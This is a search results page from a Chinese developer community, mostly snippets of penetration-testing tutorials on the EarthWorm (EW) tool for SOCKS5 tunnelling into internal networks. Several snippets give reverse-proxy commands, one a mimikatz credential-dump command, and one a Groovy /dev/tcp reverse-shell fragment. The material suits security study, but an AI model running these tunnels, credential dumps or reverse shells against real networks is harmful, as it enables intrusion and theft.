文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
    时间不限
    最近一周
    最近一月
    最近三月
  • 来自专栏web渗透

    【云+社区年度征文】 EW(EarthWorm) 反向 socks5 代理

    工具: EW: https://github.com/idlefire/ew proxychains: https://github.com/rofl0r/proxychains-ng 小米随身wifi =/etcmake && make installmake install-config 安装成功后,修改其配置为你的公网ip及端口 vi /etc/proxychains.conf 改为 第三步、EW 反向 socks5 代理  服务器端 chmod +x ew_for_linux64. /ew_for_linux64 -s rcsocks -l 1080 -e 1024  kali连接1080端口,正和proxychains配置中端口相对应,然后目标机器连接1024端口,服务器则是将1080 端口的请求发送到1024端口给目标机器 目标机器端 ew_for_Win.exe -s rssocks -d 公网ip -e 1024 手敲代码要注意为rssocks,不是服务器端的rcsocks,第一次测试就因为这个导致失败

    1.5K11发布于 2020-12-03
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    内网穿透之通过Earthworm(EW)进行隧道穿透

    内网穿透之通过Earthworm(EW)进行隧道穿透 一. 通过Earthworm(EW)进行隧道穿透 在进行多层网段渗透时,我们经常会遇到各种代理隧道问题,仅靠使用端口转发无法完成,可以利用Socks协议建立隧道进行连接,Socks是代理服务可以说是lcx 端口转发工具的升级版,有两种协议,分别是Socks 4和Socks 55.三层正向代理 假设通过上述描述,利用隧道穿透获取到了办公区域的PC机权限,探测后发现核心服务器的存在于PC主机处于同一网段,通过已知的凭据,最终目标是利用上传EW工具进行隧道穿透获取到核心服务器的权限 二.本篇总结 随着隧道技术的不断更新迭代,越来越多的攻击者利用隧道技术攻击企业内网,通过本篇文章从Earthworm(EW)隧道工具的利用方式,并且通过大量的案例来演示了多个实际常见的隧道场景,比如我们通过拿到系统权限后利用多个协议实现隧道穿透

    2.1K152编辑于 2023-11-01
  • 来自专栏捞月亮的小北

    解决:Error evaluating expression ew.sqlSegment != null and ew.sqlSegment != and ew.nonEmptyOfWhere

    在写测试方法的时候 ,发现 bookLambdaQueryWrapper.like(name != null, Book::getName , name); 这一句老是报错

    2.1K10编辑于 2024-05-07
  • 来自专栏字节脉搏实验室

    内网穿透后抓包技巧

    如果ew流量从1080端口走,bp也设置了1080这样会报端口占用了,如何解决呢? ? 一、实验环境 ? 二、实验工具 Earthworm:下载地址:http://rootkiter.com/EarthWorm/ ? 三、操作步骤 首先模拟提前拿下一台Win7靶机,实战环境可通过蚁剑进行上传EW工具,注意根据实际环境上传对应系统版本的EW文件,实验这里我就直接提前上传EW了。 ? /ew_for_linux64 -s rcsocks -l 1080 -e 8880 该命令是将本地1080端口的流量走向本地8880端口 Win7靶机:ew.exe -s rssocks -d 172.17.60.226 EW连接上后再修改Proxychains的配置文件 (vi /etc/proxychains.conf)将dynamic_chain前的注释去掉,并在最后写上socks5 127.0.0.1 1080

    1.6K20发布于 2020-12-08
  • 来自专栏闪石星曜CyberSecurity

    EW入侵内网渗透记录

    四、EW简介 EW是一款四年前开发好的NAT穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透代理服务,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道 同类工具还有socat,就实战来看,EW操作较简单,SOCAT有时会发生段错误,而EW则比较稳定。 六、EW代理实战 数据流向: 黑客KALI SOCKS v5 <-> VPS 10801 <-> VPS 10241 <-> 肉鸡 rssocks 操作在 公网IP主机 和 WEB肉机上进行目的是通过反弹方式创建 第二步,在WEB主机(172.2.40.129)上执行: ew_for_Win.exe -s rssocks -d 120.53.123.X -e 10241 这句话的意思是,在WEB肉鸡上开启socks5 工具使用第三步,在KALI上:vim /etc/proxychains.conf socks5 120.53.123.X 10241 ?

    2.8K20发布于 2021-01-11
  • 来自专栏Bypass

    最好用的内网穿透工具合集

    5Earthworm 内网穿透 EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 项目地址: http://rootkiter.com/EarthWorm 使用方法: (1)正向 SOCKS v5 服务器,适用于目标网络边界存在公网IP且可任意开监听端口。 . /ew -s ssocksd -l 1080 (2)反弹SOCKS v5 服务器,适用于目标网络边界不存在公网 IP,需要通过反弹方式创建 socks 代理 a) 先在一台具有公网 ip 的主机A上运行以下命令 /ew -s rcsocks -l 1080 -e 8888 b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口 . /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ .

    8.7K10发布于 2020-09-08
  • 来自专栏漏斗社区

    基于百香果内网安全沙盘的SOCKS学习·上篇

    SOCKS分为SOCKS4和SOCKS5两种类型: SOCKS4只支持TCP协议; SOCKS5不仅支持TCP/UDP协议,还支持各种身份验证机制等,其标准端口为1080。 三、EarthWorm 工具介绍 工具介绍: EarthWormEW)是一款便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,可以在复杂的网络环境中实现网络穿透。 EW能够以正向、反向、多级级联等方式建立网络隧道。 EW工具包提供了多个可执行文件,以适用不同的操作系统。 EW的新版本为Termite。 EW隧道通信建立 VPS:访问webshell并上传ew 工具 image.png 配置ew 反向代理监听: ew -s rcsocks -l 1008 -e 888 image.png webshell image.png 右键选中,选择“在代理隧道中运行选中程序” image.png image.png 5.

    1.2K40发布于 2021-01-08
  • 来自专栏betasec

    安全攻防 | EarthWorm 代理

    EWEarthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 下载地址:https://github.com/idlefire/ew 官方网站:http://rootkiter.com/EarthWorm/ EW的指令信息如下所示: -s 选择功能类型: 共包含 /ew -s lcx_tran - l 9999 -f 10.10.3.111 -g 8888 在目标机Host3上启动socks5代理并监听8888端口: . /ew -s rcsocks -l 1080 -e 8888 在Host1执行,将Hack的8888端口与V2的9999端口绑定,建立socks5通道: . /ew -s lcx_listen -l 9999 -e 7777 在目标机Host3执行,启动socks5服务,并反弹到Host2的7777端口: .

    1.1K20发布于 2021-03-16
  • 来自专栏betasec

    安全攻防 | 网络代理之EarthWorm

    EWEarthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 下载地址:https://github.com/idlefire/ew 官方网站:http://rootkiter.com/EarthWorm/ EW的指令信息如下所示: -s 选择功能类型: 共包含 /ew -s lcx_tran - l 9999 -f 10.10.3.111 -g 8888 在目标机Host3上启动socks5代理并监听8888端口: . /ew -s rcsocks -l 1080 -e 8888 在Host1执行,将Hack的8888端口与V2的9999端口绑定,建立socks5通道: . /ew -s lcx_listen -l 9999 -e 7777 在目标机Host3执行,启动socks5服务,并反弹到Host2的7777端口: .

    4.3K20发布于 2021-03-16
  • 来自专栏FreeBuf

    内网渗透测试:隐藏通讯隧道技术

    它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080。 EarthWorm 下载链接:https://github.com/rootkiter/EarthWorm https://codeload.github.com/idlefire/ew/zip/master EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 EarthWorm能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。 EarthWorm EW有六种命令格式,分别是ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran。

    3K40发布于 2020-07-13
  • 来自专栏kayden

    内网跨边界应用

    :https://github.com/sensepost/reDuh 二、内网跨边界代理 1、EW 官网:http://rootkiter.com/EarthWorm/ github:https:// /ew -s ssocksd -l 1080 (2)反弹 SOCKS v5 服务器 先在一台具有公网 ip 的主机A上运行以下命令: $ . /ew -s rcsocks -l 1080 -e 8888 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口 $ . Binary-files/tree/bd3223082afbf88421fe391eb55b9eb2da7d533e 使用说明:https://rootkiter.com/Termite/README.txt EarthWorm >/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor(

    1.3K10编辑于 2022-09-29
  • 来自专栏FreeBuf

    内网隐藏通信隧道技术——EW隧道

    内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。 EW是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可以在复杂的网络环境下完成网络穿透。 正向 SOCKS v5 服务器 $ ./ew -s ssocksd -l 1080 2. /ew -s rcsocks -l 1080 -e 8888 b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口 $ . v5

    2.5K50发布于 2021-08-24
  • 来自专栏谢公子学安全

    内网渗透 | 内网转发工具的使用

    内网转发工具的使用 目录 内网转发 reGeorg结合proxychains代理链(HTTP隧道) EW(EarthWorm)结合proxychains代理链 EW正向代理 EW反向代理 Ssocks正向代理 (EarthWorm)结合proxychains代理链 EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 不管是linux还是windows系统,Earthworm的包都是一个,如图上面。直接进入包里面,选择对应的程序即可执行 EW正向代理 Web服务器的设置 如果是Linux系统 . 监听本地的1080端口 我们主机的设置 如果是Linux系统,配置proxychains代理链的配置文件,将代理设置成 100.100.10.12的1080端口:socks5 100.100.10.12 代理链的配置文件,将代理设置成 127.0.0.1的1080端口:socks5 127.0.0.1 1080 然后命令前面加上 proxychains即可。

    3.2K20编辑于 2022-01-19
  • 来自专栏漏斗社区

    基于百香果内网安全沙盘的SOCKS学习·下篇

    0x02 实战场景 实战环境模拟真实复杂的网络环境,包括ew的多级级联场景和内网服务器限制主动出网场景。 一、EarthWorm 一级级联和二级级联场景 1. 拓扑变更 image.png 2. 场景任务 Z能够通过WEBShell控制A,经过扫描获得B的SSH弱口令,需要通过EW工具的二级级联在Z上访问到C的WEB服务。 4. 任务配置 1> 先配置1级级联 VPS配置:ew -s rcsocks -l 1008 -e 888 image.png A -> webshell:ew -s rssocks -d 66.28.6.110 场景任务 Z能够通过WEBShell控制A,经过扫描获得B的SSH弱口令,需要通过EW工具的二级级联在Z上访问到C的WEB服务。 4. /ew_for_linux lcx_tran 8888 10.10.16.111 -g 80 image.png 成功实现站点访问。

    86620发布于 2021-01-08
  • 来自专栏云上计算

    森海塞尔Evolution Wireless Digital: EW-DP

    EW-DP系列EW-DP系列除了可堆叠的EW-DP EK接收器外,该系列还包括一个配领夹麦克风的腰包式发射机(EW-D SK)、一个手持式发射机(EW-D SKM-S)和一个即将于10月推出的直插式发射机 (EW-DP SKP)。 当前上市的套装共有三款,包括:EW-DP ME 2 套装,配有一个腰包式发射机和ME 2全指向形夹式(领夹式)麦克风;EW-DP ME 4套装,配有一个心形指向夹式麦克风,适用于噪音较大的环境;以及EW-DP 最后,EW-DP诞生了,我愿称之为极简UHF系统。”值得一提的是,EW-DP是首款具有磁性堆叠接收机的便携式无线系统,该接收机配有朝向用户的OLED显示屏和符合人体工学的操控设计。 EW-DP的磁性板让电影录像师能够简单(且安全)地叠放多个接收器。

    74120编辑于 2023-04-17
  • 来自专栏一名白帽的成长史

    【内网渗透】关于内网代理转发技术

    lcx 2、Netsh 本地端口转发 正向端口转发 3、SSH 二、SOCKS代理类 1、reGeorg reGeorg+Proxifier reGeorg+proxychains 类似工具 2、EarthWorm github.com/SECFORCE/Tunna https://github.com/nccgroup/ABPTTS https://github.com/sensepost/reDuh Part.5 EarthWorm 正向代理 EW 是一套便携式的网络穿透工具,既支持SOCKS5代理转发,又支持静态端口转发。 将EW对应的执行程序上传至外网服务器: ? 外网服务器开启代理: ew.exe -s ssocksd -l 8889 ? 可以直接在浏览器中开启代理: ? //这里使用的是FoxyProxy插件。 首先在攻击机上开启监听: ew.exe -s rcsocks -l 1080 -e 8880 ?

    3.1K21发布于 2020-07-20
  • 来自专栏Ms08067安全实验室

    内网漫游之SOCKS代理大结局

    1.Earthworm 网址:https://github.com/rootkiter/EarthWorm EW 是一套便携式的网络穿透工具,具有 1.正向socks v5服务器 适用于目标机器拥有一个外网IP ew –s ssocksd –l 888 ? 上述命令架设了一个端口为888,SOCKS的代理。 2.反弹socks v5服务器 适用于目标机器没有公网IP,但可访问内网资源 A.先上传ew 到左侧ip地址为139.XXX.XX.113公网VPS的C盘上,运行下列命令: ew -s rcsocks 端口: ew -s lcx_listen -l 999 -e 777 D.在C主机上启动SOCKS V5服务,并反弹到B主机的777端口上,命令如下。 ew -s rssocks -d 10.48.128.12 -e 777 E.在MY PC上可以通过访问公网VPS 139.XXX.XX.113:1080来使用在C主机架设的socks5代理。

    2.7K10发布于 2019-09-24
  • 来自专栏漏洞知识库

    内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

    ---- earthworm正向跨平台socks代理 反向代理 一、客户端攻击机吧外网的888端口转发到本地的1008端口: . /ew_for_linux64 -s rcsocks -l 1008 -e 888 ? 二、目标边界接收888端口的数据: ew_for_Win.exe -s rssocks -d 192.168.2.13 -e 888 ? ? 正向代理 目标边界执行: ew_for_Win.exe -s ssocksd ‐l 1080 ? 攻击机服务端修改proxychains文件:192.168.2.13是目标边界的IP ? ---- earthworm正向跨平台socks代理 下载地址:https://github.com/L-codes/Neo-reGeorg 一、生成webshell,密码是123456: python

    6K30发布于 2020-11-25
  • 来自专栏小生观察室

    记一次护网漏洞发现到域控全过程

    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt image.png 内网转发 利用Proxifier+EarthWorm /ew -s rcsocks -l 1080 -e 8888 // 在 1.1.1.1 的公网主机添加转接隧道,将 1080 收到的代理请求转交给反连 8888 端口的主机 b) . /ew -s rssocks -d 1.1.1.1 -e 8888 // 将目标网络的可控边界主机反向连接公网主机 c) HackTools 可通过访问 1.1.1.1:1080 端口使用 rssocks 主机提供的 socks5 代理服务 image.png image.png image.png image.png image.png image.png 登录内网,当无法使用

    3.4K30编辑于 2021-12-09
  • 来自专栏HACK学习

    内网渗透 | 手把手教你如何进行内网渗透

    0x2.1 做跳板 采用ew套接字<socks>代理,服务器上运行准备好的ew_for_linux64,本地使用proxifier配置如下: ? ? 还是使用earthworm进行socks代理,服务端运行后,本机配置如下: ? windows ? kali 配置完成后,用nmap探测一下 ? 0x5 总结 0x5.1 跳板总结 拿到DMZ的shell或权限后,可以使用ew建立socks代理,我们的windows用proxifier,我们的linux用proxychains连接,即可访问内网。 ew_for_linux64 -s ssocksd -l 8888 ew_for_windows.exe -s ssocksd -l 8888 ew建立ss连接。

    10.7K22发布于 2020-02-17
第 2 页第 3 页第 4 页第 5 页第 6 页第 7 页第 8 页第 9 页第 10 页第 11 页
点击加载更多

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

领券